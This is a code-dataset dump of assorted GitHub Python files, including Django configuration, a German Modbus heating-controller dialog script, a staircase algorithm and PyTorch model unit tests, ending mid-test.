blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
750220a87bb360ef45473989010452b73e6dfdf0 | b5b4ab792f2b7b0eec33ed45868cf6fa91624e56 | /backend/my_phone/modules/shop/apps.py | 5b51582071a68f2d2cbfe0907290454e8ec05858 | [] | no_license | zch007/MyPhone | 90c6559976849a2f04cd94d6aed1ee1c20ba643f | aa1bd151df29d6c63f4deab49e6ba05ae5505d67 | refs/heads/master | 2023-05-05T02:29:31.738057 | 2021-05-16T15:50:01 | 2021-05-16T15:50:01 | 367,917,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 90 | py | from django.apps import AppConfig
class CourseConfig(AppConfig):
name = 'shop'
| [
"zzzch007@126.com"
] | zzzch007@126.com |
0858be05317e776041c88d31faa0a67e9714f19e | e3c2ca0b0ae27f4bdafb036487bdcb655a342c97 | /user/migrations/0002_auto_20210325_0818.py | 86b196c796883762b85b4a0d47ff4355a5feded9 | [] | no_license | ulaitorcodes/shenovate | b09eb2331854de8bc2cff15a44b4cbb14bd480e4 | 9152b43107c49e628b53ac8a22ddd606f8b60e5a | refs/heads/main | 2023-04-01T11:01:47.822609 | 2021-04-04T11:20:09 | 2021-04-04T11:20:09 | 345,303,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | # Generated by Django 3.1.7 on 2021-03-25 08:18
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('user', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='MyUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.DateField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.DeleteModel(
name='Students',
),
]
| [
"elijahekongofficial@gmail.com"
] | elijahekongofficial@gmail.com |
c956a1c3e002331a1a155784ad7f4f10d8e76e27 | 3686c8a7a491e7249b789166f91ff94fe95aff48 | /src/fakeformat/errors.py | 89bd5a6131fff6f2263c309d29e08020c4e4b7ac | [
"MIT"
] | permissive | roelandschoukens/fake-format-ml | 7a132acf4027abd6770f876534532d2f1a46e480 | 88ace75b300a5291a1536175cee47b7f44a1d3ef | refs/heads/master | 2021-06-08T11:44:36.045210 | 2021-05-18T09:17:27 | 2021-05-18T09:17:27 | 171,635,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | class ParseException(Exception):
"""Base class for parsing exceptions"""
def __init__(self, message):
self.message = message
| [
"roeland.schoukens@gmail.com"
] | roeland.schoukens@gmail.com |
fb8eec8a12cdb2614bc6751979dd044d5efc8fb1 | 143bd44f0f0dd3d7f012530689f25e25f594ba7d | /netshop/urls.py | 14965effdce42961569b0ee380d5fccf163c503b | [] | no_license | momentHappy/netshop | b2237215ad6267d46ac857f39c198f5678712145 | 60890481b6feae03669f7f68059ceef631d7dd0c | refs/heads/master | 2023-07-06T09:27:23.422142 | 2021-08-04T10:34:08 | 2021-08-04T10:34:08 | 392,647,390 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,126 | py | """netshop URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, re_path, include
from netshop.settings import DEBUG, MEDIA_ROOT
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('goods.urls')),
path('user/', include('userapp.urls')),
path('cart/', include('cart.urls')),
path('order/', include('order.urls')),
]
if DEBUG:
from django.views.static import serve
urlpatterns += re_path(r'^media/(?P<path>.*)/$', serve, {"document_root": MEDIA_ROOT}),
| [
"572836448@qq.com"
] | 572836448@qq.com |
dc57c185931f36ed5214e938dec7d582cbceacde | de43abb8a3d8b8e6e136b27c0928b14380ea9323 | /2021.06.16.(06).py | 58f07ff473f861a012d6bdc0fd8fb616f86eef1d | [] | no_license | ElaineLee21/Algorithm | 0d489aeb5d2faa47ba37fbe59d877aaccb776e37 | 28e927ac2f2be218ecab9d2010e321835ff32d2b | refs/heads/main | 2023-06-03T01:42:03.375029 | 2021-06-24T14:54:32 | 2021-06-24T14:54:32 | 378,149,901 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | #백준 2609 하 정수론 및 조합론 - 최대공약수와 최소공배수
#내 풀이
a, b = map(int, input().split())
divArr = []
for i in range(2, min(a,b)+1):
while a%i == 0 and b%i ==0:
try:
divArr.append(i)
a = int(a / i)
b = int(b / i)
except:
continue
greatest = 1
for i in range(len(divArr)):
greatest = greatest * divArr[i]
least = greatest * a * b
print(greatest, least, sep='\n')
| [
"noreply@github.com"
] | ElaineLee21.noreply@github.com |
df0df4c01b8de92ac3eb93bc5001e8ac66cc275c | a3c9c1dba6852b4ea3a7a690c3043adf9706d736 | /HZRR_203/Software/RPi/Zentrale/ZZ0/alt/state30301104_1630_intermediate/move_to_desktop.monitor_on_boot/deprecated/hz_rr_dialog2.py | 42124fb3e1e8f45fb66857389fe893776d6a59cf | [] | no_license | peetsi/hr23 | 08d20b34685c789fd9bdd7d4116ad2c4389aece8 | 04e4aea87b3fc5fea3e8e5b24c910db0d6a801f2 | refs/heads/master | 2023-07-14T07:56:50.509944 | 2021-08-28T02:17:29 | 2021-08-28T02:17:29 | 388,883,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,114 | py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
HZ-RR012 RS485 dialog
Created on Sat Nov 19 10:35:52 2016
@author: Peter Loster (pl)
"""
import sys
import time
import numpy as np
import usb_ser as us
import modbus as mb
import param_11c as par_c
import param_11d as par_d
import heizkreis_config as hkr_cfg
#import RPi.GPIO as GPIO
# *** global variables
par = par_d
err = 0
err |= us.serial_connect()
err |= us.ser_open()
print("Fehler=%d"%(err))
# *** voreingestellte Werte modAdr = 1
reg = 0
intSec = 10 # intervall zum Abruf der Statusanzeige
modAdr = 1
wdh = 300/intSec # wiederhole 5 Minuten lang die anzeige
vers = ['HZ-RR11c', 'HZ-RR11d']
versTxt= ['(vom 12.12.2016)', '(vom 19.12.2016)']
modFwVersion = vers[1]
def read_heizkreis_config() :
global heizkreis, modules, modTVor, modSendTvor, dtLog, filtFakt
h = hkr_cfg.get_heizkreis_config()
if len(h) > 5:
(heizkreis, modules, modTVor, modSendTvor, dtLog, filtFakt) = h
else:
# some default values
heizkreis = 0
modules = []
modTVor = 0
modSendTvor = []
dtLog = 180 # time interval to log a data set
filtFakt = 0.1
def menu(x):
# x=0: zeige Menü für Auswahl
print('Modul Adresse = %d; Firmware Version=%s'%(modAdr,modFwVersion))
print(' 0 Ende')
print(' A Modul Adresse V Modul Firmware Version')
print(' 1 Teste Modul-Adresse (ping)')
print(' 2 Staus: anzeigen; 3 alle %dsec anzeigen'%intSec)
print(' 4 Parameter lesen 5 alle Param.-> Werkseinst.')
print(' 6 Ventil dauerhaft auf 7 Ventil dauerhaft zu')
print(' 8 Ventil regeln (Ende dauerhaft)')
print(' 9 Regler inaktiv setzen 10 Regler aktiv setzen')
print('11 schneller Ablauf fuer Test 12 normale Geschwindigkeit')
print('20 sende Vorlauftemperatur von Zentrale')
print('21 neue Parameter senden 31 alle Parameter ins EEPROM')
print('39 neue Parameter an alle Module senden und ins EEPROM speichern')
print('40 Parameter aller Module abholen und in Datei speichern')
print(60*"-")
print('Vorsicht: 49 Reset ueber Watchdog')
print('Vorsicht: 50 jede Minute status abspeichern' )
print('')
a = input('Wahl? ')
if a=='a' or a=='A' :
return 99
if a=='v' or a=='V' :
return 98
return int(a)
def select_controller():
fertig = False
while not fertig :
a = input( 'module=0; regler=1,2,3,4; alle=5; Ende=9; wahl? ')
try:
reg = int(a)
if reg == 5 :
return[1,2,3,4]
elif reg <= 4 :
return [reg]
elif reg == 9 :
return []
except:
pass
def perform_command( controllers, command ) :
for reg in controllers:
cmd = mb.wrap_modbus( modAdr, command, reg, "" )
print('sende: %s'%(cmd))
rxCmd = us.txrx_command( cmd )
print('empfange: %s'%( rxCmd ) )
def select_version() :
global par
global vers
global versTxt
i=0
for ver in range( len(vers) ) :
print('%d %s %s'%(i+1,vers[i],versTxt[i]))
i += 1
wahl=0
while not wahl :
a = input("Wahl ?")
try:
wahl = int(a)
except:
wahl = 0
pass
if wahl < 0 : wahl = 0
if wahl > len(vers) : wahl = 0
print('wahl=%d, version %s'%(wahl, vers[wahl-1]))
if wahl == 1:
par = par_c
if wahl == 2:
par = par_d
return vers[wahl-1]
def doit( wahl ):
global modAdr
global index
global par
global modFwVersion
if wahl == 1 : # Teste Modul-Adresse (ping)
err = us.ser_reset_buffer()
txCmd = mb.wrap_modbus( modAdr, 1, 0, "" )
print(txCmd)
rxCmd = us.txrx_command( txCmd )
print('empfange: %s'%( rxCmd ) )
if wahl == 2 : # Staus: anzeigen;
err = us.ser_reset_buffer()
controllers = select_controller()
perform_command( controllers, 0x02 )
if wahl == 3 : # alle %dsec anzeigen
w = wdh
while( w ) :
for reg in [1,2,3,4]:
txCmd = mb.wrap_modbus( modAdr, 2, reg, "" )
print('sende: %s'%(txCmd))
rxCmd = us.txrx_command( txCmd )
print('empfange: %s'%( rxCmd ) )
time.sleep(intSec)
w -= 1
print()
if wahl == 4 : # Parameter lesen
tbl=[]
for regler in [0,1,2,3,4]:
txCmd = mb.wrap_modbus( modAdr, 3, regler, "" )
print('sende: %s'%(txCmd))
rxCmd = us.txrx_command( txCmd )
cmdList = rxCmd
print(rxCmd)
tbl1 = cmdList.split()
tbl.append( tbl1 )
#print('empfange: %s'%( rxCmd ) )
# sort as a table:
spalten = len(tbl)
zeilen = len(tbl[0])
print(zeilen,spalten)
for x in range(zeilen):
zs=[]
for y in range(spalten):
zs.append(tbl[y][x])
print("%10s %5s %5s %5s %5s"%(zs[0],zs[1],zs[2],zs[3],zs[4]))
if wahl == 5 : # alle Parameter auf Werkseinstellung setzen
perform_command( [0], 0x30 )
if wahl == 6 : # Ventil dauerhaft auf
controllers = select_controller()
perform_command( controllers, 0x31 )
if wahl == 7 : # Ventil dauerhaft zu
controllers = select_controller()
perform_command( controllers, 0x32 )
if wahl == 8 : # Ventil regeln (Ende dauerhaft)
controllers = select_controller()
perform_command( controllers, 0x33 )
if wahl == 9 : # Regler inaktiv setzen
controllers = select_controller()
perform_command( controllers, 0x34 )
if wahl == 10 : # controller active
controllers = select_controller()
perform_command( controllers, 0x35 )
if wahl == 11 : # fast
controllers = select_controller()
perform_command( controllers, 0x36 )
if wahl == 12 : # end fast -> normal speed
controllers = select_controller()
perform_command( controllers, 0x37 )
if wahl == 20 : # sende Vorlauftemperatur von Zentrale
vtzstr = input("Zentrale Vorlauftemperatur:")
cmd = mb.wrap_modbus( modAdr, 0x20, 0, ' '+vtzstr+' ' )
print('sende: %s'%(cmd))
rxCmd = us.txrx_command( cmd )
print('empfange: %s'%( rxCmd ) )
if wahl == 21 : # parameter senden
controllers = select_controller()
for reg in controllers:
cmd=modFwVersion
for i in par.index:
cmd += ' ' + par.valFst[i]%( par.valDef[i] )
cmd += ' '
txCmd = mb.wrap_modbus( modAdr, 0x21, reg, cmd )
print( 'sende: %dbyte, cmd=%s'%(len(txCmd), txCmd ))
rxCmd = us.txrx_command( txCmd )
print('empfange: %s'%( rxCmd.strip() ) )
dtEeprom = 0.2
print('warte %d sec bis Befehl ausgeführt ist ...'%(dtEeprom))
print("-"*40)
time.sleep(dtEeprom)
if wahl == 31 : # parameter ins eeprom speichern
reg=0
cmd = mb.wrap_modbus( modAdr, 0x39, reg, "" )
print('sende: %s'%(cmd))
rxCmd = us.txrx_command( cmd )
print('empfange: %s'%( rxCmd ) )
if wahl == 39 : # parameter aller module setzen und ins EEPROM speichern
print()
print("-"*60)
print('ACHTUNG: GROSSE AENDERUNG - LOG-Programm vorher beenden !!!')
print("-"*60)
antwort = input("wirklich durchführen? J/n :")
if antwort == "J":
for modAdr in modules :
for reg in [1,2,3,4] :
# build command
cmd=modFwVersion
for i in par.index:
cmd += ' ' + par.valFst[i]%( par.valDef[i] )
cmd += ' '
txCmd = mb.wrap_modbus( modAdr, 0x21, reg, cmd )
#print( 'sende: %dbyte, cmd=%s'%(len(txCmd), txCmd ))
rxCmd = us.txrx_command( txCmd )
print('empfange: %s'%( rxCmd.strip() ) )
print("modul %d; Regler %d; "%(modAdr,reg), end="")
if "ACK" in rxCmd :
print("ACK")
else:
print("---")
#print('warte %d sec bis Befehl ausgeführt ist ...'%(dtEeprom))
#print("-"*40)
# fixiere im EEPROM
dtEeprom = 1.5
time.sleep(dtEeprom)
reg=0
cmd = mb.wrap_modbus( modAdr, 0x39, reg, "" )
# print('sende: %s'%(cmd))
rxCmd = us.txrx_command( cmd )
# print('empfange: %s'%( rxCmd ) )
if "ACK" in rxCmd :
print(" EEPROM ACK")
else:
print(" EEPROM --- Schreibfehler")
if wahl == 40 : # parameter aller module abholen und abspeichern
pass
dateTime = time.strftime( "%Y%m%d_%H%M%S", time.localtime())
datName = "log/par_hk%d_%s.dat"%(heizkreis, dateTime)
print("Schreibe Datei: %s"%(datName))
fout = open(datName,"w")
print("Modul:",end="")
for moduleAdr in modules:
print(moduleAdr," ", end="")
for regler in [0,1,2,3,4]:
txCmd = mb.wrap_modbus( moduleAdr, 3, regler, "" )
#print('sende: %s'%(txCmd))
rxCmd = us.txrx_command( txCmd )
hs = "Mod%d Reg%d %s\r\n"%( moduleAdr, regler, rxCmd )
fout.write(hs)
print(" fertig")
fout.close()
if wahl == 49: # reset ueber Watchdog auslösen
print('Modul Adresse ist %d'%(modAdr))
cmd = mb.wrap_modbus( modAdr, 0x3A, 0, "" )
print('sende: %s'%(cmd))
rxCmd = us.txrx_command( cmd )
print('empfange: %s'%( rxCmd ) )
if wahl == 50: # jede Minute status einlesen und speichern
print('Modul Adresse ist %d'%(modAdr))
dateiName = 'log/log_HZ-RR012_'+time.strftime('%Y-%M-%d_%H:%M:%S.dat')
odat = open( dateiName, 'w' )
while True :
for regler in [1,2,3,4]:
txCmd = mb.wrap_modbus( modAdr, 2, regler, "" )
#print('sende: %s'%(cmd))
rxCmd = us.txrx_command( txCmd )
logstr = time.strftime('%Y-%M-%d_%H:%M:%S ') + rxCmd
print('store: %s'%( logstr ) )
odat.write( logstr + '\r\n' )
odat.flush()
time.sleep(60.0)
print()
if wahl == 98 :
modFwVersion = select_version()
if wahl == 99 :
a=0
while a<1 or a >31 :
a = int( input( 'Modul Adresse 1..30; wahl? ') )
modAdr = a
print()
wahl = 1
while wahl > 0 :
read_heizkreis_config()
wahl = menu(0)
print( "----------------wahl=%d-------------"%(wahl) )
doit(wahl)
| [
"pl@loster.com"
] | pl@loster.com |
fed38d32e3c3d4c4c31ce116303ad6588a73d350 | 49cd488edb28d0433aaab9686e90ed90d134dd14 | /tests/test_generator.py | c422ffbb35a6f1b2df7ba62d732e99b0d49a368f | [
"MIT"
] | permissive | Dmdv/python-fibers | 349fab65a37475b2fee73bdc53960b1a289227bd | 20349077843033610864935e45977cf33d16a7e1 | refs/heads/master | 2021-01-15T20:53:34.925672 | 2013-08-06T21:19:08 | 2013-08-06T21:19:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py |
import sys
sys.path.insert(0, '../')
import unittest
import fibers
from fibers import Fiber
class genlet(Fiber):
def __init__(self, *args, **kwds):
self.args = args
self.kwds = kwds
Fiber.__init__(self, target=self.run)
def run(self):
fn, = self.fn
fn(*self.args, **self.kwds)
def __iter__(self):
return self
def __next__(self):
self.parent = fibers.current()
result = self.switch()
if self.is_alive():
return result
else:
raise StopIteration
# Hack: Python < 2.6 compatibility
next = __next__
def Yield(value):
g = fibers.current()
while not isinstance(g, genlet):
if g is None:
raise RuntimeError('yield outside a genlet')
g = g.parent
g.parent.switch(value)
def generator(func):
class generator(genlet):
fn = (func,)
return generator
# ____________________________________________________________
class GeneratorTests(unittest.TestCase):
def test_generator(self):
seen = []
def g(n):
for i in range(n):
seen.append(i)
Yield(i)
g = generator(g)
for k in range(3):
for j in g(5):
seen.append(j)
self.assertEqual(seen, 3 * [0, 0, 1, 1, 2, 2, 3, 3, 4, 4])
if __name__ == '__main__':
unittest.main(verbosity=2)
| [
"saghul@gmail.com"
] | saghul@gmail.com |
769b8ad326294ddf17b174be872d2a2885bdd24e | 0ee04869142ede700d9db2eec187a5e51761840c | /src/main/python/staircase.py | 4b6a435d05dd2553a451d5748c806e72f5619dbd | [
"Apache-2.0"
] | permissive | mohnoor94/ProblemsSolving | 6435b1c8bdc1fe6041be570aaca83fdb4bc4d89c | 9c82817ee71bdecba311dc2631550436d65ca64e | refs/heads/master | 2023-08-08T22:34:06.492076 | 2023-08-01T07:08:02 | 2023-08-01T07:08:02 | 145,218,228 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,075 | py | def number_of_ways(n):
"""
*** 'Amazon' interview question ***
Staircase problem with allowed steps of only 1 or 2 at a time.
Problem statement and more details: https://youtu.be/5o-kdjv7FD0
"""
if n == 0 or n == 1:
return 1
result = s1 = s2 = 1
for i in range(2, n + 1):
result = s1 + s2
s1 = s2
s2 = result
return result
def number_of_ways_general(n, steps):
"""
*** 'Amazon' interview question ***
Staircase problem with allowed steps given in a set.
Problem statement and more details: https://youtu.be/5o-kdjv7FD0
"""
if n == 0:
return 1
nums = [0] * (n + 1)
nums[0] = 1
for i in range(1, n + 1):
total = 0
for j in steps:
if i - j >= 0:
total += nums[i - j]
nums[i] = total
return nums[n]
if __name__ == '__main__':
print(0, "==>", number_of_ways(0))
print(1, "==>", number_of_ways(1))
print(2, "==>", number_of_ways(2))
print(3, "==>", number_of_ways(3))
print(4, "==>", number_of_ways(4))
print(5, "==>", number_of_ways(5))
print(6, "==>", number_of_ways(6))
print(7, "==>", number_of_ways(7))
print("********************")
print(0, ",", {1, 2}, "==>", number_of_ways_general(0, {1, 2}))
print(1, ",", {1, 2}, "==>", number_of_ways_general(1, {1, 2}))
print(2, ",", {1, 2}, "==>", number_of_ways_general(2, {1, 2}))
print(3, ",", {1, 2}, "==>", number_of_ways_general(3, {1, 2}))
print(4, ",", {1, 2}, "==>", number_of_ways_general(4, {1, 2}))
print(5, ",", {1, 2}, "==>", number_of_ways_general(5, {1, 2}))
print(6, ",", {1, 2}, "==>", number_of_ways_general(6, {1, 2}))
print(7, ",", {1, 2}, "==>", number_of_ways_general(7, {1, 2}))
print("********************")
print(0, ",", {1, 2, 5}, "==>", number_of_ways_general(0, {1, 2, 5}))
print(1, ",", {1, 2, 5}, "==>", number_of_ways_general(1, {1, 2, 5}))
print(2, ",", {1, 2, 5}, "==>", number_of_ways_general(2, {1, 2, 5}))
print(3, ",", {1, 2, 5}, "==>", number_of_ways_general(3, {1, 2, 5}))
print(4, ",", {1, 2, 5}, "==>", number_of_ways_general(4, {1, 2, 5}))
print(5, ",", {1, 2, 5}, "==>", number_of_ways_general(5, {1, 2, 5}))
print(6, ",", {1, 2, 5}, "==>", number_of_ways_general(6, {1, 2, 5}))
print(7, ",", {1, 2, 5}, "==>", number_of_ways_general(7, {1, 2, 5}))
print("********************")
print(0, ",", {1, 3, 5}, "==>", number_of_ways_general(0, {1, 3, 5}))
print(1, ",", {1, 3, 5}, "==>", number_of_ways_general(1, {1, 3, 5}))
print(2, ",", {1, 3, 5}, "==>", number_of_ways_general(2, {1, 3, 5}))
print(3, ",", {1, 3, 5}, "==>", number_of_ways_general(3, {1, 3, 5}))
print(4, ",", {1, 3, 5}, "==>", number_of_ways_general(4, {1, 3, 5}))
print(5, ",", {1, 3, 5}, "==>", number_of_ways_general(5, {1, 3, 5}))
print(6, ",", {1, 3, 5}, "==>", number_of_ways_general(6, {1, 3, 5}))
print(7, ",", {1, 3, 5}, "==>", number_of_ways_general(7, {1, 3, 5}))
print("********************")
| [
"moh.noor94@gmail.com"
] | moh.noor94@gmail.com |
9fd3f088f8e72f894442977ddf10738898c0f0c3 | c66d37f197802cf14a687566fa7b92077c784f08 | /test/model/test_deep_learning_model_pt.py | cdc9f8afc98f69499187017dcdb8a12aa5071151 | [
"Apache-2.0"
] | permissive | yourLeilei/Sherpa.ai-Federated-Learning-Framework | a0a0d7ed8d0f1baa3c4e7703022b86a789e19e40 | 72f9e3b2ac2d282cbf3705ceb17223529102c8d8 | refs/heads/master | 2023-01-24T08:54:00.212810 | 2020-11-30T10:47:10 | 2020-11-30T10:47:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,400 | py | import numpy as np
from unittest.mock import Mock, patch, call
import pytest
from shfl.model.deep_learning_model_pt import DeepLearningModelPyTorch
class TestDeepLearningModel(DeepLearningModelPyTorch):
def train(self, data, labels):
pass
def predict(self, data):
pass
def get_model_params(self):
return [np.random.rand(5, 1, 32, 32), np.random.rand(10, )]
def set_model_params(self, params):
pass
def test_deep_learning_model_private_data():
criterion = Mock()
optimizer = Mock()
model = Mock()
batch = 32
epoch = 2
metrics = [0, 1, 2, 3]
device = 'device0'
dpl = TestDeepLearningModel(model, criterion, optimizer, batch, epoch, metrics, device)
assert dpl._model.id == model.id
assert dpl._data_shape == 1
assert dpl._labels_shape == (10,)
assert dpl._criterion.id == criterion.id
assert dpl._optimizer.id == optimizer.id
assert dpl._batch_size == batch
assert dpl._epochs == epoch
assert np.array_equal(dpl._metrics, metrics)
assert dpl._device == device
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
@patch('shfl.model.deep_learning_model_pt.torch')
@patch('shfl.model.deep_learning_model_pt.TensorDataset')
@patch('shfl.model.deep_learning_model_pt.DataLoader')
def test_pytorch_model_train(mock_dl, mock_tdt, mock_torch, mock_get_params):
criterion = Mock()
optimizer = Mock()
model = Mock()
model_return = [1, 2, 3, 4, 5]
model.return_value = model_return
mock_get_params.return_value = [np.random.rand(5, 1, 24, 24), np.random.rand(10)]
batch = 1
epoch = 2
metrics = None
device = 'cpu'
kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
num_data = 5
data = np.array([np.random.rand(24, 24) for i in range(num_data)])
data = np.reshape(data, (data.shape[0], 1, data.shape[1], data.shape[2]))
labels = np.array([np.zeros(10) for i in range(num_data)])
for l in labels:
l[np.random.randint(0, len(l))] = 1
element = []
for el, la in zip(data, labels):
x = Mock()
x.float().to.return_value = el[np.newaxis]
y = Mock()
y.float().to.return_value = la[np.newaxis]
element.append([x, y])
mock_dl.return_value = element
kdpm.train(data, labels)
optimizer_calls = []
model_calls = []
criterion_calls = []
for i in range(epoch):
for elem in element:
inputs, y_true = elem[0].float().to(), elem[1].float().to()
optimizer_calls.extend([call.zero_grad(), call.step()])
model_calls.extend([call(inputs), call.zero_grad()])
criterion_calls.extend([call(model_return, mock_torch.argmax(y_true, -1)), call().backward()])
kdpm._optimizer.assert_has_calls(optimizer_calls)
kdpm._model.assert_has_calls(model_calls)
kdpm._criterion.assert_has_calls(criterion_calls)
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
@patch('shfl.model.deep_learning_model_pt.torch')
@patch('shfl.model.deep_learning_model_pt.TensorDataset')
@patch('shfl.model.deep_learning_model_pt.DataLoader')
def test_predict(mock_dl, mock_tdt, mock_torch, mock_get_params):
criterion = Mock()
optimizer = Mock()
model = Mock()
model_return = Mock()
model_return.cpu().numpy.return_value = [1, 2, 3, 4]
model.return_value = model_return
mock_get_params.return_value = [np.random.rand(5, 1, 24, 24), np.random.rand(10)]
batch = 32
epoch = 1
metrics = None
device = 'cpu'
kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
num_data = 5
data = np.array([np.random.rand(24, 24) for i in range(num_data)])
data = np.reshape(data, (data.shape[0], 1, data.shape[1], data.shape[2]))
element = []
for el in data:
x = Mock()
x.float().to.return_value = el[np.newaxis]
element.append([x, -1])
mock_dl.return_value = element
y_pred_return = kdpm.predict(data)
model_calls = []
res = []
for elem in element:
inputs = elem[0].float().to()
model_calls.extend([call(inputs), call(inputs).cpu(), call(inputs).cpu().numpy()])
res.extend(model_return.cpu().numpy.return_value)
kdpm._model.assert_has_calls(model_calls)
assert np.array_equal(res, y_pred_return)
def side_effect_from_numpy(value):
x = Mock()
x.float.return_value = value
return x
def side_effect_argmax(value, axis):
return value
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.predict')
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
@patch('shfl.model.deep_learning_model_pt.torch')
def test_evaluate(mock_torch, mock_get_params, mock_predict):
num_data = 5
criterion = Mock()
optimizer = Mock()
criterion.return_value = np.float64(0.0)
model = Mock()
mock_torch.argmax.side_effect = side_effect_argmax
mock_torch.from_numpy.side_effect = side_effect_from_numpy
predict_return = Mock()
predict_return.cpu().numpy.return_value = np.random.rand(5, 10)
mock_predict.return_value = predict_return
mock_get_params.return_value = [np.random.rand(num_data, 1, 24, 24), np.random.rand(10)]
batch = 32
epoch = 2
metrics = {'aux': lambda x, y: -1}
device = 'cpu'
kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
data = np.array([np.random.rand(24, 24) for i in range(num_data)])
data = np.reshape(data, (data.shape[0], 1, data.shape[1], data.shape[2]))
labels = np.array([np.zeros(10) for i in range(num_data)])
for l in labels:
l[np.random.randint(0, len(l))] = 1
res_metrics = kdpm.evaluate(data, labels)
mock_predict.assert_called_once_with(data)
kdpm._criterion.assert_called_once_with(mock_predict.return_value, labels)
assert np.array_equal([0, -1], res_metrics)
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.evaluate')
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
def test_performance(mock_get_params, mock_evaluate):
num_data = 5
criterion = Mock()
optimizer = Mock()
model = Mock()
criterion.return_value = np.float64(0.0)
mock_get_params.return_value = [np.random.rand(num_data, 1, 24, 24), np.random.rand(10)]
mock_evaluate.return_value = [0, 1, 2, 3, 4]
batch = 32
epoch = 1
metrics = None
device = 'cpu'
kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
data = np.array([np.random.rand(24, 24) for i in range(num_data)])
data = np.reshape(data, (data.shape[0], 1, data.shape[1], data.shape[2]))
labels = np.array([np.zeros(10) for i in range(num_data)])
for l in labels:
l[np.random.randint(0, len(l))] = 1
res = kdpm.performance(data, labels)
mock_evaluate.assert_called_once_with(data, labels)
assert res == mock_evaluate.return_value[0]
def test_get_model_params():
criterion = Mock()
optimizer = Mock()
model = Mock()
params = [np.random.rand(5, 1, 2) for i in range(5)]
params.append(np.random.rand(10))
weights = []
for elem in params:
m = Mock()
m.cpu().data.numpy.return_value = elem
weights.append(m)
model.parameters.return_value = weights
batch = 32
epoch = 1
metrics = None
device = 'cpu'
kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
parm = kdpm.get_model_params()
# two calls in constructor and one call in get_model_params method
kdpm._model.parameters.assert_has_calls([call() for i in range(3)])
for one, two in zip(params, parm):
assert np.array_equal(one, two)
@patch('shfl.model.deep_learning_model_pt.torch')
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
def test_set_weights(mock_get_params, mock_torch):
num_data = 5
criterion = Mock()
optimizer = Mock()
criterion.return_value = np.float64(0.0)
model = Mock()
model_params = [9, 5, 4, 8, 5, 6]
m_model_params = []
for elem in model_params:
aux = Mock()
aux.data = elem
m_model_params.append(aux)
model.parameters.return_value = m_model_params
mock_get_params.return_value = [np.random.rand(num_data, 1, 24, 24), np.random.rand(10)]
mock_torch.from_numpy.side_effect = side_effect_from_numpy
batch = 32
epoch = 1
metrics = None
device = 'cpu'
kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
set_params = [0, 1, 2, 3, 4, 5]
kdpm.set_model_params(set_params)
new_model_params = [x.data for x in kdpm._model.parameters()]
assert np.array_equal(new_model_params, set_params)
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
def test_wrong_data(mock_get_params):
num_data = 5
criterion = Mock()
optimizer = Mock()
model = Mock()
criterion.return_value = np.float64(0.0)
mock_get_params.return_value = [np.random.rand(num_data, 1, 24, 24), np.random.rand(10)]
batch = 32
epoch = 1
metrics = None
device = 'cpu'
kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
num_data = 5
data = np.array([np.random.rand(24, 24) for i in range(num_data)])
